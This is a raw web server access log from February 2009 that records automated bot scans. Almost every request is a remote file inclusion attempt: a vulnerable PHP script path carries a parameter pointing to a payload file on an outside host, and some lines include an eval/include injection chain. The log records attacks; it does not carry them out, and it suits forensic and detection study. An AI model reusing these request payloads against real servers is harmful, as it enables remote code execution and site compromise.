148.245.102.115 - - [05/Feb/2009:00:12:31 -0600] "GET /logs/access_log.1213660800//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
148.245.102.115 - - [05/Feb/2009:00:13:04 -0600] "GET /logs/access_log.1213660800//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/idv6.txt?%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
148.245.102.115 - - [05/Feb/2009:00:13:07 -0600] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/id.txt?%0D? HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
76.74.129.144 - - [05/Feb/2009:00:13:09 -0600] "GET /logs/access_log.1213660800//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/idv6.txt?%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
89.248.110.224 - - [05/Feb/2009:00:13:26 -0600] "GET /logs/access_log.1213660800//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/id.txt?%0D? HTTP/1.1" 404 350 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
84.21.71.133 - - [05/Feb/2009:00:13:45 -0600] "GET /logs/access_log.1217203200%20///////?dir_ws=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
80.25.82.126 - - [05/Feb/2009:00:14:42 -0600] "GET /logs/access_log.1217808000//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://canalteresina.org/TT?? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
80.25.82.126 - - [05/Feb/2009:00:14:43 -0600] "GET /logs/access_log.1217980800//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://canalteresina.org/TT?? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
148.245.102.115 - - [05/Feb/2009:00:14:45 -0600] "GET /logs/access_log.1213660800//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.avonparkcamp.com/anyinventory/docs/en/win.id.txt?%0D?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
80.25.82.126 - - [05/Feb/2009:00:14:56 -0600] "GET /logs/access_log.1211155200//faqsupport/samplefaqsupport.php?path[docroot]=http://canalteresina.org/TT?? HTTP/1.1" 404 343 "-""libwww-perl/5.76"
77.221.151.34 - - [05/Feb/2009:00:15:00 -0600] "GET /logs/?sourcedir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 117460 "-""libwww-perl/5.803"
77.221.151.34 - - [05/Feb/2009:00:15:00 -0600] "GET /?sourcedir=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
64.13.249.26 - - [05/Feb/2009:00:15:28 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://f-y-p.nl/ids.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
64.13.249.26 - - [05/Feb/2009:00:15:28 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://f-y-p.nl/ids.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
80.25.82.126 - - [05/Feb/2009:00:15:56 -0600] "GET /logs/access_log.1214956800//faqsupport/samplefaqsupport.php?path[docroot]=http://canalteresina.org/TT?? HTTP/1.1" 404 343 "-""libwww-perl/5.76"
209.172.33.230 - - [05/Feb/2009:00:16:16 -0600] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 357 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:00:16:16 -0600] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 362 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:00:16:16 -0600] "GET /logs/access_log.1216080000%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 385 "-""libwww-perl/5.812"
82.194.72.142 - - [05/Feb/2009:00:16:20 -0600] "GET /logs/access_log.1213660800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
82.194.72.142 - - [05/Feb/2009:00:16:21 -0600] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
82.194.72.142 - - [05/Feb/2009:00:16:21 -0600] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
70.85.146.66 - - [05/Feb/2009:00:16:38 -0600] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hanbol.es.kr/data/id1.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
70.85.146.66 - - [05/Feb/2009:00:16:38 -0600] "GET /logs/access_log.1214524800%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hanbol.es.kr/data/id1.txt???? HTTP/1.1" 404 385 "-""Mozilla/5.0"
70.85.146.66 - - [05/Feb/2009:00:16:38 -0600] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hanbol.es.kr/data/id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
70.85.146.66 - - [05/Feb/2009:00:16:43 -0600] "GET /logs/access_log.1212278400%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hanbol.es.kr/data/id1.txt???? HTTP/1.1" 404 385 "-""Mozilla/5.0"
209.172.33.230 - - [05/Feb/2009:00:17:05 -0600] "GET /logs/access_log.1214524800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 384 "-""libwww-perl/5.812"
209.172.33.230 - - [05/Feb/2009:00:17:10 -0600] "GET /logs/access_log.1212278400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 384 "-""libwww-perl/5.812"
70.85.146.66 - - [05/Feb/2009:00:17:13 -0600] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hanbol.es.kr/data/id1.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
70.85.146.66 - - [05/Feb/2009:00:17:13 -0600] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hanbol.es.kr/data/id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
70.85.146.66 - - [05/Feb/2009:00:17:13 -0600] "GET /logs/access_log.1214524800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hanbol.es.kr/data/id1.txt???? HTTP/1.1" 404 383 "-""Mozilla/5.0"
70.85.146.66 - - [05/Feb/2009:00:17:18 -0600] "GET /logs/access_log.1212278400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hanbol.es.kr/data/id1.txt???? HTTP/1.1" 404 383 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:00:17:42 -0600] "GET /logs/access_log.1206576000//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:00:17:42 -0600] "GET //skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:00:17:42 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:00:17:42 -0600] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
80.25.82.126 - - [05/Feb/2009:00:18:03 -0600] "GET /logs/access_log.1212451200//faqsupport/samplefaqsupport.php?path[docroot]=http://canalteresina.org/TT?? HTTP/1.1" 404 343 "-""libwww-perl/5.76"
70.85.146.66 - - [05/Feb/2009:00:18:31 -0600] "GET /logs/access_log.1216944000//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hanbol.es.kr/data/id1.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
80.25.82.126 - - [05/Feb/2009:00:19:22 -0600] "GET /logs/access_log.1218067200//faqsupport/samplefaqsupport.php?path[docroot]=http://canalteresina.org/TT?? HTTP/1.1" 404 343 "-""libwww-perl/5.76"
88.191.95.106 - - [05/Feb/2009:00:19:41 -0600] "GET /logs/access_log.1206576000%20%20//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:00:19:42 -0600] "GET /logs/access_log.1206230400%20%20//skin/zero_vote/error.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
79.174.72.67 - - [05/Feb/2009:00:21:25 -0600] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
79.174.72.67 - - [05/Feb/2009:00:21:25 -0600] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
79.174.72.67 - - [05/Feb/2009:00:22:24 -0600] "GET /logs/access_log.1216512000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
79.174.72.67 - - [05/Feb/2009:00:22:24 -0600] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
79.174.72.67 - - [05/Feb/2009:00:22:25 -0600] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
79.174.72.67 - - [05/Feb/2009:00:22:46 -0600] "GET /logs/access_log.1211068800//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
79.174.72.67 - - [05/Feb/2009:00:23:26 -0600] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
88.191.95.106 - - [05/Feb/2009:00:24:28 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:00:24:28 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:00:24:28 -0600] "GET /logs/access_log.1213920000//modules/vwar/admin/admin.php?vwar_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:00:25:24 -0600] "GET /logs/access_log.1218758400//modules/vwar/admin/admin.php?vwar_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
87.101.4.49 - - [05/Feb/2009:00:26:30 -0600] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
87.101.4.49 - - [05/Feb/2009:00:26:30 -0600] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
88.191.95.106 - - [05/Feb/2009:00:27:09 -0600] "GET //login.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:00:27:09 -0600] "GET /logs//login.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:00:27:09 -0600] "GET /logs/access_log.1206230400//login.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:00:27:09 -0600] "GET /logs/access_log.1216080000//login.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
202.44.52.78 - - [05/Feb/2009:00:27:49 -0600] "GET /logs/access_log.1216080000%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 385 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:00:27:49 -0600] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 357 "-""libwww-perl/5.65"
202.44.52.78 - - [05/Feb/2009:00:27:51 -0600] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 362 "-""libwww-perl/5.65"
88.191.95.106 - - [05/Feb/2009:00:28:55 -0600] "GET /logs/access_log.1216080000%20%20//login.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:00:28:55 -0600] "GET /logs/access_log.1206230400%20%20//login.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
202.44.52.78 - - [05/Feb/2009:00:29:09 -0600] "GET /logs/access_log.1214524800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.bu.ac.th/english/news/phpnews/img/readme.txt???? HTTP/1.1" 404 384 "-""libwww-perl/5.65"
87.101.4.49 - - [05/Feb/2009:00:30:37 -0600] "GET //skins/advanced/advanced1.php?pluginpath[1]=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:30:46 -0600] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
212.158.167.98 - - [05/Feb/2009:00:31:06 -0600] "GET //index.http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
212.158.167.98 - - [05/Feb/2009:00:31:35 -0600] "GET /logs/access_log.1215907200//index.http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 370 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
212.158.167.98 - - [05/Feb/2009:00:31:36 -0600] "GET //index.http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 343 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
87.101.4.49 - - [05/Feb/2009:00:32:22 -0600] "GET /logs/access_log.1212278400//poll/booth.php?include_path=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:32:23 -0600] "GET //poll/booth.php?include_path=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:32:23 -0600] "GET /logs//poll/booth.php?include_path=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:32:32 -0600] "GET /logs/access_log.1214352000//skins/advanced/advanced1.php?pluginpath[1]=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:32:32 -0600] "GET //skins/advanced/advanced1.php?pluginpath[1]=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:32:33 -0600] "GET /logs//skins/advanced/advanced1.php?pluginpath[1]=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:32:33 -0600] "GET /logs/access_log.1214352000//skins/advanced/advanced1.php?pluginpath[0]=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:32:33 -0600] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:32:33 -0600] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:32:39 -0600] "GET /logs/access_log.1214438400//skins/advanced/advanced1.php?pluginpath[1]=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:00:32:39 -0600] "GET /logs/access_log.1214438400//skins/advanced/advanced1.php?pluginpath[0]=http://www.e-geocenter.com/geo/slo/modules/xfsection//i.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
212.158.167.98 - - [05/Feb/2009:00:32:40 -0600] "GET /logs/access_log.1215907200//index.http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 370 "-""libwww-perl/5.810"
212.158.167.98 - - [05/Feb/2009:00:32:40 -0600] "GET //index.http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
212.158.167.98 - - [05/Feb/2009:00:32:41 -0600] "GET /logs//index.http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
79.174.72.67 - - [05/Feb/2009:00:32:43 -0600] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D/&w=include($_GET[a]);&a=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
85.204.231.202 - - [05/Feb/2009:00:34:46 -0600] "GET //errors.php?error=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
89.111.173.113 - - [05/Feb/2009:00:36:23 -0600] "GET //?path%5Bdocroot%5D=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
82.194.72.142 - - [05/Feb/2009:00:37:08 -0600] "GET /logs/access_log.1212105600//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
82.194.72.142 - - [05/Feb/2009:00:37:08 -0600] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
82.194.72.142 - - [05/Feb/2009:00:37:09 -0600] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
212.158.167.98 - - [05/Feb/2009:00:37:39 -0600] "GET /logs/access_log.1215907200//index.php?_SERVER[DOCUMENT_ROOT]=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 321 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
212.158.167.98 - - [05/Feb/2009:00:37:39 -0600] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 294 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
82.194.72.142 - - [05/Feb/2009:00:37:41 -0600] "GET /logs/access_log.1211673600//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
200.136.52.8 - - [05/Feb/2009:00:38:05 -0600] "GET /logs/home.php?x=http://www.buenosairesidiomas.com/centro/idv6.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
200.136.52.8 - - [05/Feb/2009:00:38:05 -0600] "GET /home.php?x=http://www.buenosairesidiomas.com/centro/idv6.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
200.136.52.8 - - [05/Feb/2009:00:38:05 -0600] "GET /logs/access_log.1218758400/home.php?x=http://www.buenosairesidiomas.com/centro/idv6.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
212.158.167.98 - - [05/Feb/2009:00:38:05 -0600] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
212.158.167.98 - - [05/Feb/2009:00:38:12 -0600] "GET /logs/access_log.1215907200//index.php?_SERVER[DOCUMENT_ROOT]=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
212.158.167.98 - - [05/Feb/2009:00:38:13 -0600] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
212.158.167.98 - - [05/Feb/2009:00:38:13 -0600] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
200.136.52.8 - - [05/Feb/2009:00:38:37 -0600] "GET /logs/access_log.1219449600/home.php?x=http://www.buenosairesidiomas.com/centro/idv6.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
89.111.173.113 - - [05/Feb/2009:00:39:04 -0600] "GET /logs/access_log.1212364800//?path%5Bdocroot%5D=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
89.111.173.113 - - [05/Feb/2009:00:39:04 -0600] "GET //?path%5Bdocroot%5D=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
89.111.173.113 - - [05/Feb/2009:00:39:06 -0600] "GET /logs//?path%5Bdocroot%5D=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 200 117465 "-""libwww-perl/5.805"
212.158.167.98 - - [05/Feb/2009:00:39:09 -0600] "GET /logs//index.http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
212.158.167.98 - - [05/Feb/2009:00:39:09 -0600] "GET //index.http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
212.158.167.98 - - [05/Feb/2009:00:39:19 -0600] "GET /logs//index.http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
212.158.167.98 - - [05/Feb/2009:00:39:19 -0600] "GET //index.http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
89.111.173.113 - - [05/Feb/2009:00:39:46 -0600] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
79.174.72.67 - - [05/Feb/2009:00:39:46 -0600] "GET /logs/access_log.1218758400//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D/&w=include($_GET[a]);&a=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
79.174.72.67 - - [05/Feb/2009:00:39:46 -0600] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D/&w=include($_GET[a]);&a=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
79.174.72.67 - - [05/Feb/2009:00:39:47 -0600] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D/&w=include($_GET[a]);&a=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
192.134.106.1 - - [05/Feb/2009:00:40:53 -0600] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
192.134.106.1 - - [05/Feb/2009:00:40:54 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
212.158.167.98 - - [05/Feb/2009:00:41:02 -0600] "GET /logs/access_log.1219968000//index.http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 370 "-""libwww-perl/5.810"
192.134.106.1 - - [05/Feb/2009:00:41:10 -0600] "GET //webcalendar/tools/send_reminders.php?noSet=0&includedir=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
192.134.106.1 - - [05/Feb/2009:00:41:10 -0600] "GET /logs//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
80.25.82.126 - - [05/Feb/2009:00:41:14 -0600] "GET /logs/access_log.1206230400//faqsupport/samplefaqsupport.php?path[docroot]=http://canalteresina.org/TT?? HTTP/1.1" 404 343 "-""libwww-perl/5.76"
85.204.231.202 - - [05/Feb/2009:00:41:57 -0600] "GET /logs/access_log.1218758400//errors.php?error=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
85.204.231.202 - - [05/Feb/2009:00:41:58 -0600] "GET //errors.php?error=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
85.204.231.202 - - [05/Feb/2009:00:41:59 -0600] "GET /logs//errors.php?error=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
89.111.173.113 - - [05/Feb/2009:00:42:44 -0600] "GET /logs//?path%5Bdocroot%5D=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 200 117465 "-""libwww-perl/5.805"
89.111.173.113 - - [05/Feb/2009:00:42:44 -0600] "GET //?path%5Bdocroot%5D=http://relativ76.altervista.org/robots.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
